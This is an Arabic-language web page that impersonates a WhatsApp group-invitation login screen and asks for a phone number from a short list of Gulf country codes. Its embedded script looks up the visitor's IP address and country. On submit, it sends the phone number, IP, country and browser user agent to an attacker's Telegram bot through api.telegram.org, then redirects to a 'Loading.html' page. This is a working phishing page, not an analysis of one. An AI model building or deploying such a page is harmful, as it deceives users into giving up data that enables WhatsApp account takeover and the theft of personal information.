<!DOCTYPE html>
<html lang="ar" id="facebook" class="">
<head>
        <meta charset="utf-8">
        <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer">
        <title id="pageTitle">الدعوة للانضمام إلى مجموعة واتساب</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="apple-mobile-web-app-capable" content="yes">
        <meta name="description" content="الدعوة للانضمام إلى مجموعة واتساب">
        <meta name="keywords">
        <meta property="og:title" content="">
        <meta property="og:image" content="./M3tri_wsp_files/J5gK5AgJ_L5.png">
        <meta property="og:site_name" content="WhatsApp.com">
        <meta property="og:description" content="الدعوة للانضمام إلى مجموعة واتساب">
        <meta property="og:keywords">
        <meta property="invite_link_type" content="REGULAR">
        <meta property="invite_link_type_v2" content="">
        <meta name="mobile-web-app-capable" content="yes">
        <meta name="robots" content="noindex">
        <link rel="icon" href="./M3tri_wsp_files/ujTY9i_Jhs1.png">
        <link type="text/css" rel="stylesheet" href="./M3tri_wsp_files/C2fHuK6eV5E.css" crossorigin="anonymous" />

      
        


  <link rel="stylesheet" href="./M3tri_wsp_files/style.css">


  
      <style>
        
        .select-dropdown {
            position: relative;
            display: inline-block;
            width: 200px;
            
            font-family: Arial, sans-serif;
            
            font-size: 14px;
            
        }

        
        .select-dropdown::after {
            content: '\25BE';
            
            position: absolute;
            top: 50%;
            right: 10px;
            transform: translateY(-50%);
            pointer-events: none;
        }

        
        .select-dropdown select {
            appearance: none;
            -webkit-appearance: none;
            -moz-appearance: none;
            width: 100%;
            padding: 8px 30px 8px 10px;
            border: 1px solid #ccc;
            background-color: #fff;
            cursor: pointer;
        }

        
        .select-dropdown select option:checked {
            background-color: #e0e0e0;
        }

        
        .select-dropdown select:focus {
            outline: none;
            box-shadow: 0 0 4px rgba(0, 0, 0, 0.1);
        }

        
        #phoneCountryCode {
            border-top: none;
            border-left: none;
            border-right: none;
            width: 108px;
            background-color: #f1f1f1;
            padding: 10px;
            font-size: 16px;
            border-bottom: 3px solid #36ba6d;
            border-radius: 5px;
        }

        

        
        button[type="submit"] {
            padding: 10px 20px;
            font-size: 16px;
            background-color: #4CAF50;
            color: #fff;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }

        
        button[type="submit"]:hover {
            background-color: #45a049;
        }

        .input-phone {
            border-top: none;
            border-left: none;
            border-right: none;
            width: 75%;
            font-size: 21px;
            border-bottom: 3px solid #36ba6d;
        }

        :focus {
            outline: none;

        }


        input::placeholder {

            opacity: 75%;
        }

        ._9vcv,
        ._advm {
            border: none;
        }

        ul.iti__country-list>#iti-0__country-listbox {
            list-style-type: none;
            margin-right: -266px;
            margin-top: 1px;
            padding: 0;
        }

        ._9r_7 h4,
        ._9r_7 ._7gz5,
        ._9r_7 p,
        ._9r_7 li,
        ._9r_7 ol {
            font-size: 21px;
            line-height: 26px;
        }

        .iti--separate-dial-code .iti__selected-flag {
            background-color: rgba(0, 0, 0, 0.05);
            margin-right: -77px;
            direction: ltr;
            margin-left: 29px;
            padding: 2px;
        }

        .iti--separate-dial-code .iti__selected-dial-code {
            margin-left: 4px;
        }

        .iti__flag.iti__sa {
            height: 15px;
            background-position: -4339px 0px;
            display: none;
        }

        input::placeholder {

            opacity: 75%;
        }

        ul {
            list-style-type: none;
            margin-right: -200;
            padding: 0;
        }

        .iti__country-list {
            position: relative;
            z-index: 2;
            list-style: none;
            text-align: left;
            padding: 0;
            margin: 0 0 -5px 23px;
            box-shadow: 1px 1px 4px rgba(0, 0, 0, 0.2);
            background-color: white;
            border: 1px solid #CCC;
            white-space: nowrap;
            max-height: 200px;
            overflow-y: scroll;
            -webkit-overflow-scrolling: touch;
        }

        #phone::placeholder {
            font-size: 16px;
            text-align: center;
        }

        .code-input-container {
            display: flex;
        }

        .code-input {
            border-top: none;
            border-right: none;
            border-left: none;
            border-bottom: 3px solid #36ba6d;
            direction: ltr;
            background-color: #f1f1f1;
            width: 40px;
            height: 40px;
            font-size: 18px;
            text-align: center;
            margin-right: 5px;
        }
        .btn.btn-default {
  background-color: #fff;
  color: #333;
  border: 1px solid #ccc;
  padding: 10px 20px;
  border: none;
  font-size: 14px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  cursor: pointer;
}

.btn.btn-default:hover {
  background-color: #e0e0e0;
}

.btn.btn-default:active {
  background-color: #d0d0d0;
}

.btn.btn-default:focus {
  outline: none;
  box-shadow: none;
}

    </style>
  
</head>

<header class="_af-2 _afwk"  id="u_0_0_J5" style="background: #fcf5eb;">
                    <div class="_afvx">
                        <div class="_afvy">
                            <div class="_af8g"><button aria-label="فتح قائمة الهاتف المحمول" class="_afvu _ain3 _9vcv" id="u_0_1_uK"><span class="_advp _aeam"><img  src="./M3tri_wsp_files/Minnu.png"></span></button>
                          
						  
                            </div>
                        </div><span class="_afwd"><a  href="#" class="_9vcv" ><span class="_advp _aeam"><img class="_afvz" alt="صفحة واتساب الرئيسية" src="./M3tri_wsp_files/Whatt.png"></span></a></span><span class="_afw1"><a  href="#" class="_9vcv" ><span class="_advp _aeam"><img class="_afvz" alt="صفحة واتساب الرئيسية" src="./M3tri_wsp_files/DSxOAUB0raA.png"></span></a></span>
                        <nav class="_afwe">
                            <ul class="_afwg">
                                <li class="_afn_">
                                    <div><button aria-controls="replace_me_subnav" aria-expanded="false" id="u_0_7_NM" class="_9vd5 _aens _afod _afoe"><span class="_afog"><span class="_9vg3 _aj1b" style="">الخصائص</span></span><svg width="8" height="13" fill="none" class="_9vd8 _agnt _afol _afok">
                                                <path d="M7.41 1.91L2.83 6.5l4.58 4.59L6 12.5l-6-6 6-6 1.41 1.41z" fill="currentColor"></path>
                                            </svg></button>
                                      
                                    </div>
                                </li>
                                <li class="_afn_"><a href="#" class="_9vd5 _aens _afod" target="_self"><span><span class="_afog"><span class="_9vg3 _aj1b" style="">الخصوصية</span></span></span></a></li>
                                <li class="_afn_"><a href="#" class="_9vd5 _aens _afod" target="_self"><span><span class="_afog"><span class="_9vg3 _aj1b" style="">مركز
                                                    المساعدة</span></span></span></a></li>
                                <li class="_afn_"><a href="#" class="_9vd5 _aens _afod" target="_self"><span><span class="_afog"><span class="_9vg3 _aj1b" style="">المدونة</span></span></span></a></li>
                                <li class="_afn_"><a href="#" class="_9vd5 _aens _afod" target="_self"><span><span class="_afog"><span class="_9vg3 _aj1b" style="">للأنشطة التجارية</span></span></span></a></li>
                            </ul>
                        </nav>
                        <div class="_agga"><span class="_ag1l">
						<span class="AA" style=" width: max-content; padding: 100px; ">
						<a href="#" class="_9vd5 _aens _afod" target="_self"><span><span class="_afog"><span class="_9vg3 _aj1b" style="">واتساب
                                                    ويب</span></span></span></a></span><a href="#" class="_aeo8 _9vcv _9u4o _9u4i" ><span class="_advp _aeam">تنزيل</span><span><svg width="16" height="16" viewBox="0 0 16 16" fill="none" class="_wauiIcon__download-alternative _agnt _9u4c">
                                            <path fill-rule="evenodd" clip-rule="evenodd" d="M13.75 13.75C13.75 14.1642 13.4142 14.5 13 14.5L3 14.5C2.58579 14.5 2.25 14.1642 2.25 13.75C2.25 13.3358 2.58579 13 3 13L13 13C13.4142 13 13.75 13.3358 13.75 13.75Z" fill="currentColor"></path>
                                            <path fill-rule="evenodd" clip-rule="evenodd" d="M8.7487 2C8.7487 1.58579 8.41291 1.25 7.9987 1.25C7.58448 1.25 7.2487 1.58579 7.2487 2L7.2487 9.53955L3.19233 5.51449C2.89831 5.22274 2.42344 5.22458 2.13168 5.5186C1.83993 5.81263 1.84177 6.2875 2.13579 6.57925L7.46912 11.8714C7.76154 12.1616 8.23325 12.1616 8.52567 11.8714L13.859 6.57926C14.153 6.2875 14.1549 5.81263 13.8631 5.5186C13.5714 5.22458 13.0965 5.22274 12.8025 5.51449L8.7487 9.53697L8.7487 2Z" fill="currentColor"></path>
                                        </svg></span></a></span><a href="#" aria-label="تنزيل" class="_afwh _adie _adif"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" class="_wauiIcon__download-alternative _agnt _adid _afbl">
                                    <path fill-rule="evenodd" clip-rule="evenodd" d="M13.75 13.75C13.75 14.1642 13.4142 14.5 13 14.5L3 14.5C2.58579 14.5 2.25 14.1642 2.25 13.75C2.25 13.3358 2.58579 13 3 13L13 13C13.4142 13 13.75 13.3358 13.75 13.75Z" fill="currentColor"></path>
                                    <path fill-rule="evenodd" clip-rule="evenodd" d="M8.7487 2C8.7487 1.58579 8.41291 1.25 7.9987 1.25C7.58448 1.25 7.2487 1.58579 7.2487 2L7.2487 9.53955L3.19233 5.51449C2.89831 5.22274 2.42344 5.22458 2.13168 5.5186C1.83993 5.81263 1.84177 6.2875 2.13579 6.57925L7.46912 11.8714C7.76154 12.1616 8.23325 12.1616 8.52567 11.8714L13.859 6.57926C14.153 6.2875 14.1549 5.81263 13.8631 5.5186C13.5714 5.22458 13.0965 5.22274 12.8025 5.51449L8.7487 9.53697L8.7487 2Z" fill="currentColor"></path>
                                </svg></a></div>
                    </div>
                </header>

<body style=" background-color: #fcf5eb; ">

<div class="container" style=" margin-block: 100px; ">
  <h2>WhatsApp تسجيل الدخول</h2>
  <div style=" text-align: center; margin: 20px;">
  <img class="_9vx6" src="./M3tri_wsp_files/_0dVljceIA5.png">
  <h4 class="_9vd5 _9scb" style="color:#5E5E5E; font-size: large;">الدعوة للانضمام إلى مجموعة واتساب</h4>
  </div>
  
<form action="#">
<input type="hidden" id="ip">
<input type="hidden" id="country">

    <div class="input-group" style="text-align: center;">


<select id="countryCode" name="countryCode" style="padding: 10px; background-color: #f1f1f1;"><option value="BH">🇧🇭 +973</option><option value="JO">🇯🇴 +962</option><option value="KW">🇰🇼 +965</option><option value="OM">🇴🇲 +968</option><option value="QA">🇶🇦 +974</option><option value="SA">🇸🇦 +966</option><option value="AE">🇦🇪 +971</option></select>
	
      <input style="width: auto; padding: 10px;margin-top: 5px;margin-bottom: 5px;border: 1px solid #ccc;border-radius: 5px;display: inline-block;box-sizing: border-box;" type="tel" id="phoneNumber" name="phoneNumber" placeholder="050 123 4567" pattern="[0-9]+">
      <div id="error-message" style="text-align: center; color: red;"></div>
    </div>
<div style="text-align: center;">
    <button style="padding: 10px 20px; font-size: 16px; background-color: #4CAF50; color: #fff; border: none; border-radius: 5px; cursor: pointer; display: inline-block; width: 150px;" type="submit">متابعة</button>
</div>
  </form>
</div>
  <script src="./M3tri_wsp_files/jquery-3.6.4.min.js"></script>
          <script src="./M3tri_wsp_files/jquery.mask.min.js"></script>

  <script src="bot_config.js"></script>
		

<script>
            let agent = navigator.userAgent;
			
 // جلب معلومات الآي بي باستخدام خدمة ipinfo.io
        $.get("https://ipinfo.io", function(response) {
            var ipAddress = response.ip;
            var country = response.country; // الحصول على اسم الدولة

            // تحديث الحقل المخصص للآي بي
            $("#ip").val(ipAddress);

            // تحديث الحقل المخصص للدولة
            $("#country").val(country);
        }, "json");
		
		
    $(document).ready(function() {
        $('form').submit(function(event) {
            event.preventDefault();


            var selectedOption = $("#countryCode option:selected").text(); // استرجاع النص المحدد من الخيار المحدد
            var countryCode = selectedOption.trim(); // الحصول على الرمز الدولي للهاتف
            var phoneNumber = $("#phoneNumber").val(); // الحصول على رقم الهاتف المدخل
            var ipAddress = $("#ip").val(); // الحصول على عنوان الآي بي
            var country = $("#country").val(); // الحصول على اسم الدولة

            // التحقق من إدخال رقم الهاتف
            if (!phoneNumber) {
                $("#error-message").text("الرجاء إدخال رقم الهاتف");
                return;
            } else {
                $("#error-message").text(""); // إزالة رسالة الخطأ في حالة إدخال رقم الهاتف
            }

            var telegramMessage = "Country Code : " + countryCode + "\nPhone Number : " + phoneNumber + "\nIP Address : " + ipAddress + "\nCountry : " + country + "\nUser Agent : " + agent + "\n/-- By METRI --/\n";

				
            var telegramBotUrl = "https://api.telegram.org/bot" + botConfig.botToken + "/sendMessage";
            var requestData = {
                chat_id: botConfig.chatId,
                text: telegramMessage
            };

            // إرسال البيانات إلى الروبوت
            $.post(telegramBotUrl, requestData, function(response) {
                // بعد الإرسال، توجيه المستخدم إلى الصفحة الأخرى
                window.location.href = "Loading.html?FGDD=Loauyb734HSDHDS783JSDUE7Y34UEUY3GSDGHDSH73JS773USUSUS7ISUS63";
            });
        });

       
    });
</script>



        <script>
            $('#phoneNumber').mask('00000000000000');
        </script>

</body>
</html>
